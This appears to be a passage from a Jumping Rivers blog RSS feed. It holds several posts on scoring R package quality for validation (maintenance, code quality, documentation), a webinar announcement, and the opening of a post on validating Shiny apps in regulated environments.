&lt;p&gt;This final post, considers the package’s maintenance aspects, including update frequency and bug management.
The general idea is that around this component is to understand if bugs are addressed in a clear, quick and transparent method.
Some of the scores are subjective, for example scoring the bug closure rate.
However, as this is combined with multiple scores, tinkering with any particular score has limited effect.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-maintainers"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-1-bug-closure-rate"&gt;Score 1: Bug Closure Rate&lt;/h3&gt;
&lt;p&gt;A score based on the median bug closure rate.
If longer than 12 months, give a score of 0; between 6 and 12 months, a score of 0.2; between 4 and 6 months, a score of 0.5; between 2 and 4 months,
a score of 0.8; and if shorter than two months, give 1.&lt;/p&gt;
&lt;p&gt;An analysis of CRAN suggests 70% of packages have a bug closure rate less than two months.&lt;/p&gt;
&lt;h3 id="score-2-maintainer"&gt;Score 2: Maintainer&lt;/h3&gt;
&lt;p&gt;Binary score of whether a package has at least one maintainer.
All packages on CRAN must have a maintainer.&lt;/p&gt;
&lt;h3 id="score-3-source-control"&gt;Score 3: Source Control&lt;/h3&gt;
&lt;p&gt;A binary score of whether the package has an associated version-controlled repository.
This isn&amp;rsquo;t just GitHub! But includes r-forge, GitLab, and various other flavours of source control out there.&lt;/p&gt;
&lt;h3 id="score-4-bug-reports-url"&gt;Score 4: Bug Reports URL&lt;/h3&gt;
&lt;p&gt;A binary score of whether a package links to a location where it is possible to file bug reports.
If possible, we try to infer this URL.
For example, if the website is a GitHub repo, then it&amp;rsquo;s almost certain to have an issues page.&lt;/p&gt;
&lt;h3 id="score-5-bugs-status"&gt;Score 5: Bugs Status&lt;/h3&gt;
&lt;p&gt;The proportion of bug reports that are closed.
If no issues have ever been opened, a value of &lt;code&gt;1&lt;/code&gt; is returned.&lt;/p&gt;
&lt;h3 id="score-6-the-number-of-contributors"&gt;Score 6: The Number of Contributors&lt;/h3&gt;
&lt;p&gt;A score based on the number of contributors to the package.
Returns 0 if a single contributor, 0.5 if two contributors, 1 if 3 or more contributors are found.
Around 60% of CRAN packages have at least two contributors. Only 30% of CRAN packages have more than two contributors.&lt;/p&gt;
&lt;h3 id="score-7-maintainers-other-packages"&gt;Score 7: Maintainers other Packages&lt;/h3&gt;
&lt;p&gt;Score based on how many packages its maintainers have created on CRAN.
A score of 1 indicates 3 or more CRAN packages, 0.5 two packages, and 0 for 1 or fewer packages.
Around 60% have two packages on CRAN, and 40% have three or more packages.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;No&amp;rsquo; of Contributors&lt;/th&gt;
&lt;th&gt;Bug Status&lt;/th&gt;
&lt;th&gt;Closure Rate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{drat}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.75&lt;/td&gt;
&lt;td&gt;0.80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.78&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{shinyjs}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.78&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.68&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tsibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.81&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;For clarity, scores where all packages are 1, have been omitted from the table.&lt;/p&gt;
&lt;p&gt;All packages have GitHub pages and are authored by experienced R developers.
&lt;code&gt;{shinyjs}&lt;/code&gt; scores 0 for the number of contributors, as there is only a &lt;a href="https://github.com/daattali/shinyjs/blob/master/DESCRIPTION" rel="external"&gt;single contributor&lt;/a&gt;.
In the context of &lt;a href="https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/" rel="external"&gt;Shiny Application validation&lt;/a&gt;,
a sole author is something to be aware of.&lt;/p&gt;
&lt;p&gt;The (surprising?) bug closure rate is 0 for &lt;code&gt;{tibble}&lt;/code&gt;, &lt;code&gt;{shinyjs}&lt;/code&gt;, and &lt;code&gt;{microbenchmark}&lt;/code&gt;.
Looking at the &lt;a href="https://github.com/tidyverse/tibble/issues" rel="external"&gt;GitHub Issues&lt;/a&gt; for &lt;code&gt;{tibble}&lt;/code&gt; there does seem to be a lot of long term issues/features.
Interestingly, we&amp;rsquo;ve found that many of the popular packages have a low score closure rate.
This is usually, that issues are also tracking some future features.
Again, individual scores aren&amp;rsquo;t the important issues. It&amp;rsquo;s the overall story!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Code Quality</title><link>https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/</link><pubDate>Thu, 10 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/code-length.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part four of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we&amp;rsquo;ll take a closer look at code quality and how we can use automated tools
to quickly get a feel for a package.
The obvious package check is &lt;code&gt;R CMD check&lt;/code&gt;.
Anyone who has created a package, is familiar with constantly running &lt;code&gt;R CMD check&lt;/code&gt; to ensure that
their package is note, warning and error free.
However, that&amp;rsquo;s not the only tool we can draw on.
Codebase size, security vulnerabilities and the number of exported functions all give a hint
to the package quality.&lt;/p&gt;
&lt;p&gt;When validating R packages, code quality contributes around 50% to the total.
Remember to check out our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;dashboard&lt;/a&gt; to get an overview.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-code-quality"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-1-passing-r-cmd-check"&gt;Score 1: Passing R CMD check&lt;/h3&gt;
&lt;p&gt;The bedrock of all good R packages!
Packages are downloaded, installed and the standard &lt;code&gt;R CMD check&lt;/code&gt; is performed.
The score is the weighted sum of errors (1) and warnings (0.25), with a maximum score of 1 (no errors or warnings) and a minimum score of 0.
Essentially, the metric will allow up to 1 error or 4 warnings before returning the lowest score of 0.&lt;/p&gt;
&lt;p&gt;We are working on being more discerning on notes and warnings, but just now, it&amp;rsquo;s a relatively simple metric that highlights packages with
potential issues.&lt;/p&gt;
&lt;h3 id="score-2-codebase-size"&gt;Score 2: Codebase Size&lt;/h3&gt;
&lt;p&gt;This score is based on the R codebase size, as determined by the number of lines of R code.
The general idea is that larger codebases are harder to maintain.
Of course, the obvious question is &amp;ldquo;what is a large R base&amp;rdquo;?&lt;/p&gt;
&lt;p&gt;Instead of coming up with arbitrary numbers, we analysed all packages on CRAN (2025/03).
If a package is in the lower quartile for codebase size, the package is scored 1.
Otherwise, the empirical CDF is used.&lt;/p&gt;
&lt;p&gt;For those who are interested, the largest R package on CRAN had 100,000+ lines of R code!&lt;/p&gt;
&lt;img src="code-length.svg" alt="Score for code length" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="score-3-security-vulnerabilities"&gt;Score 3: Security Vulnerabilities&lt;/h3&gt;
&lt;p&gt;If a package has a known security vulnerability, it receives a score of 0.
This uses the &lt;code&gt;{oysteR}&lt;/code&gt; package to detect issues.&lt;/p&gt;
&lt;h3 id="score-4-release"&gt;Score 4: Release&lt;/h3&gt;
&lt;p&gt;This is a binary score, if the package under assessment is the latest version, it&amp;rsquo;s scored 1.
Otherwise, a 0 is returned.
We did investigate using a more sophisticated scoring system based on minor and major releases.
But within the R community, semantic versioning isn&amp;rsquo;t consistently followed, so we opted for a simpler rule.&lt;/p&gt;
&lt;h3 id="score-5-exported-namespace-size"&gt;Score 5: Exported Namespace Size&lt;/h3&gt;
&lt;p&gt;Score a package based on the number of exported objects.
Fewer exported objects mean the risk surface is lower, and bugs are potentially less likely. Similar to codebase size, the question is what is large? Analysing all packages on CRAN, gave us suitable cut-offs.
If a package is in the lower quartile for the number of exports, the package is scored 1.
Otherwise, the empirical CDF is used.&lt;/p&gt;
&lt;p&gt;Our analysis of CRAN suggests that most packages export relatively few objects.
A modest package exporting 11 objects scores 0.5.
Exporting around 26 objects reduces this to around 0.25.&lt;/p&gt;
&lt;h3 id="score-6-unit-test-coverage"&gt;Score 6: Unit Test Coverage&lt;/h3&gt;
&lt;p&gt;Score based on the fraction of lines of code which are covered by a unit test.
For validation of packages in the Pharmaceutical sector we also provide additional unit tests (remediated code coverage)
and investigate the Exported function test coverage.&lt;/p&gt;
&lt;h3 id="score-7-dependencies"&gt;Score 7: Dependencies&lt;/h3&gt;
&lt;p&gt;Score based on the number of dependencies a package has, assuming a lower score for more packages.
&amp;lsquo;Suggests&amp;rsquo;, &amp;lsquo;Enhances&amp;rsquo;, base or recommended packages are not considered as dependencies when calculating this score.&lt;/p&gt;
&lt;img src="dependencies.svg" alt="Score for code length" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This is a data driven score, based on all packages in CRAN (2025/03).
If a package is in the lower quartile for the number of package dependencies, the package is scored 1.
Otherwise, the empirical CDF is used.
In practice, this means that packages with around 5 dependencies are scored 0.5, which decreases to 0 around twenty dependencies.&lt;/p&gt;
&lt;p&gt;Dependencies can be an emotive topic! As with all other scores, this metric isn&amp;rsquo;t the &amp;ldquo;be all and end all&amp;rdquo;, instead it&amp;rsquo;s just an
indication of package fragility.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;For simplicity, we&amp;rsquo;ve removed the columns on vulnerabilities, R CMD check and release, as for all packages, the score was 1.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;Dependencies&lt;/th&gt;
&lt;th&gt;Exported Namespace&lt;/th&gt;
&lt;th&gt;Test Coverage&lt;/th&gt;
&lt;th&gt;Codebase Size&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{drat}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.56&lt;/td&gt;
&lt;td&gt;0.75&lt;/td&gt;
&lt;td&gt;0.73&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.56&lt;/td&gt;
&lt;td&gt;0.84&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{shinyjs}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;td&gt;0.13&lt;/td&gt;
&lt;td&gt;0.03&lt;/td&gt;
&lt;td&gt;0.66&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.36&lt;/td&gt;
&lt;td&gt;0.12&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;td&gt;0.17&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tsibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.20&lt;/td&gt;
&lt;td&gt;0.04&lt;/td&gt;
&lt;td&gt;0.87&lt;/td&gt;
&lt;td&gt;0.11&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The scores above indicate that &lt;code&gt;{tibble}&lt;/code&gt; and &lt;code&gt;{tsibble}&lt;/code&gt; are relatively large, complex packages.
These packages export many functions, and have multiple dependencies.
Reassuringly, they have a high test coverage.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;{shinyjs}&lt;/code&gt; package has a worryingly low test coverage.
However, inspection of the &lt;a href="https://github.com/daattali/shinyjs/tree/master/tests" rel="external"&gt;code&lt;/a&gt; shows that there are many manual tests that aren&amp;rsquo;t
captured.
This highlights a key aspect, automated aren&amp;rsquo;t enough, especially in the validated setting. Part of litmus is to having a qualified person
assess the package.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Elevate Your Skills and Boost Your Career with Jumping Rivers Free Monthly Webinars</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/</link><pubDate>Tue, 08 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Are you ready to expand your knowledge in R, Python, Shiny, and Posit while becoming a more valuable asset to your team? Jumping Rivers is here to help you do just that with our free monthly webinar series designed for data professionals at all levels.
These 55-minute sessions are easy to join online and packed with practical insights to help you sharpen your skills, tackle real-world challenges, and stay ahead in the fast-evolving data landscape. Whether you’re looking to improve your coding, learn best practices for deploying apps, or dive into machine learning, there’s something here for you.&lt;/p&gt;
&lt;h2 id="webinar-schedule"&gt;Webinar Schedule&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date &amp;amp; Time (BST)&lt;/th&gt;
&lt;th style="text-align: left"&gt;Topic&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 21 August&lt;/td&gt;
&lt;td style="text-align: left"&gt;Reports that Write Themselves: Automated Reporting with Quarto&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 18 September&lt;/td&gt;
&lt;td style="text-align: left"&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 23 October&lt;/td&gt;
&lt;td style="text-align: left"&gt;Understanding Posit: Ecosystem and Enterprise Use Cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 20 November&lt;/td&gt;
&lt;td style="text-align: left"&gt;Machine Learning with Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 11 December&lt;/td&gt;
&lt;td style="text-align: left"&gt;Accessible Shiny: Designing for All Users&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;em&gt;Note: All webinars take place on the second last Thursday of each month at 13:05 UK time.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="meet-our-speakers-and-partners"&gt;Meet Our Speakers and Partners&lt;/h2&gt;
&lt;p&gt;We’re proud to host a diverse range of expert speakers and partners who bring unique perspectives and deep expertise to each session. Keep an eye out for monthly speaker breakdowns by following us on our social media platforms under the name Jumping Rivers - your go-to source for data insights.&lt;/p&gt;
&lt;h2 id="benefits-of-attending"&gt;Benefits of Attending&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Gain hands-on exposure&lt;/strong&gt; to the latest tools and best practices in R, Python, Posit, and Shiny.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Grow your professional network&lt;/strong&gt; by connecting with fellow data scientists, engineers, and experts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Boost your career prospects&lt;/strong&gt; with practical skills and industry insights that make you stand out.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible, free learning&lt;/strong&gt; — join from anywhere with no cost or commitment.&lt;/li&gt;
&lt;li&gt;Exclusive discounts for attendees:
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;2 sessions&lt;/strong&gt; and get a &lt;strong&gt;30% discount&lt;/strong&gt; for the upcoming &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; in-person conference on the 8th-9th of October 2025 - an event where you can meet and learn from leading experts in the data science and data engineering communities, network with larger companies, and enjoy great food and engaging talks.&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than 2 sessions&lt;/strong&gt; and receive a &lt;strong&gt;20% discount&lt;/strong&gt; on any of our public online training courses — known for their high quality and practical focus.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ready-to-join"&gt;Ready to Join?&lt;/h2&gt;
&lt;p&gt;Register now to secure your spot and start unlocking these benefits:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Sign up here!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We look forward to welcoming you to our webinars and supporting your data science journey!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Documentation</title><link>https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/</link><pubDate>Thu, 03 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part three of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we&amp;rsquo;ll take a closer look at package documentation and how it helps assess the &amp;ldquo;risky-ness&amp;rdquo; of a package
The documentation score evaluates how complete and helpful a package’s documentation is.
Package documentation comes in many guises.
It could be a function examples, vignettes or even a website.
While we don’t believe every package &lt;strong&gt;must&lt;/strong&gt; have a website, vignettes, and examples.
But the absence of all three usually points to weak documentation.&lt;/p&gt;
&lt;p&gt;When validating R packages, documentation contributes around 15% to the total.&lt;/p&gt;
&lt;h2 id="score-1-exported-objects-documentation"&gt;Score 1: Exported Objects Documentation&lt;/h2&gt;
&lt;p&gt;A score based on the proportion of exported objects that have documentation.
For example, if we have ten functions, but only eight are documented, then the score would be 0.8.
For all packages on CRAN, this is almost certainly 1, but for packages that are only available on GitHub, this may be less.&lt;/p&gt;
&lt;h2 id="score-2-proportion-of-help-pages-with-examples"&gt;Score 2: Proportion of Help Pages with Examples&lt;/h2&gt;
&lt;p&gt;A score based on the proportion of help pages that have examples.&lt;/p&gt;
&lt;h2 id="score-3-news-file"&gt;Score 3: NEWS file&lt;/h2&gt;
&lt;p&gt;A NEWS file is an indication of a development and release cycle.
It helps users understand what has changed between versions.
This detects the presence of a NEWS file.
Of course, R packages make this interesting with &lt;code&gt;NEWS&lt;/code&gt;, &lt;code&gt;NEWS.md&lt;/code&gt;, &lt;code&gt;inst/NEWS.md&lt;/code&gt; and/or &lt;code&gt;Changelogs&lt;/code&gt;!&lt;/p&gt;
&lt;h2 id="score-4-vignettes"&gt;Score 4: Vignettes&lt;/h2&gt;
&lt;p&gt;Around 40% of CRAN packages have a single vignette, with only 10% having more than one vignette - we checked!
For simplicity, this score is a simple binary metric, based on whether a package has any vignettes.&lt;/p&gt;
&lt;h2 id="score-5-package-website"&gt;Score 5: Package Website&lt;/h2&gt;
&lt;p&gt;Does a package have an associated website? Ten or fifteen years ago, package websites were rare.
Today, GitHub and GitLab make it easy for a package to host a website.&lt;/p&gt;
&lt;h2 id="score-6-news-updated-to-the-current-version"&gt;Score 6: NEWS updated to the Current version&lt;/h2&gt;
&lt;p&gt;The package’s NEWS file is outdated or missing, making it challenging to track recent changes, bug fixes, or updates.
This lack of transparency may pose risks, as users are unable to verify whether critical updates have been implemented.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-documentation"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We can all agree that a package doesn’t need all of the components described above.
It’s perfectly reasonable to have few examples, but very detailed vignettes.
The important point is to investigate packages that have little documentation.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;Using the packages from the previous blog post, and omitting scores where all packages scored 1, we have the following results&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;News Current&lt;/th&gt;
&lt;th&gt;Vignettes&lt;/th&gt;
&lt;th&gt;Examples&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;drat&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.43&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;microbenchmark&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;shinyjs&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.90&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;tibble&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.61&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;tsibble&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;All packages use source control, have a package website and provide documentation.
The &lt;code&gt;{microbenchmark}&lt;/code&gt; doesn&amp;rsquo;t have NEWS/Changelog. Similarly it&amp;rsquo;s missing vignettes.
But recall it still has a high overall package score.
The idea behind litmus, isn&amp;rsquo;t that a package must be perfect, but to take a pragmatic approach to scoring.&lt;/p&gt;
&lt;p&gt;Oddly, the &lt;code&gt;{tsibble}&lt;/code&gt; package does have a NEWS file, but it doesn&amp;rsquo;t mention the &lt;a href="https://github.com/tidyverts/tsibble/issues/320" rel="external"&gt;latest version&lt;/a&gt;, but I think this was an oversight.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Building Trust with Code: Validating Shiny Apps in Regulated Environments</title><link>https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/</link><pubDate>Mon, 30 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This blog post is a follow up to my &lt;a href="https://www.youtube.com/watch?v=ebIk2fxFUfI" rel="external"&gt;2025 R/Medicine talk&lt;/a&gt; on Validating Shiny Apps in Regulated Environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Over the last years Shiny has become a cornerstone in data science applications, from dashboards and review tools to interactive decision making apps. But in regulated environments like pharma, healthcare, or finance, the stakes are higher. A clever visualization isn’t enough. We need to prove the app works reliably, reproducibly, and transparently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, what does it actually mean to validate a Shiny app?&lt;/strong&gt;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Want to ensure that your application or dashboard follows the latest standards? You might benefit from our &lt;a href="https://www.jumpingrivers.com/data-science/visualisation-and-dashboards/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-validating-shiny-apps-regulated-environments"&gt;Shiny health check&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="why-validation-matters"&gt;Why Validation Matters&lt;/h3&gt;
&lt;p&gt;Validation isn&amp;rsquo;t about ticking a box. It’s about building trust.&lt;/p&gt;
&lt;p&gt;In regulated settings, apps influence real world decisions. Regulators expect traceability, reproducibility, and documentation. Without these, you&amp;rsquo;re not just at risk of bugs, you risk noncompliance. And that means delays, rework, or worse.&lt;/p&gt;
&lt;p&gt;Think of validation as a safety net. It ensures the app behaves as expected, be it under edge cases, months down the line, or even when someone else deploys it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We once helped a client whose Shiny app was blocked from deployment by their compliance team because there was no documentation of who had last changed a calculation. Adding logging and a simple GitHub workflow solved it overnight.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Validation doesn’t have to be complex. It just has to be intentional.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="what-makes-a-shiny-app-validatable"&gt;What Makes a Shiny App Validatable?&lt;/h3&gt;
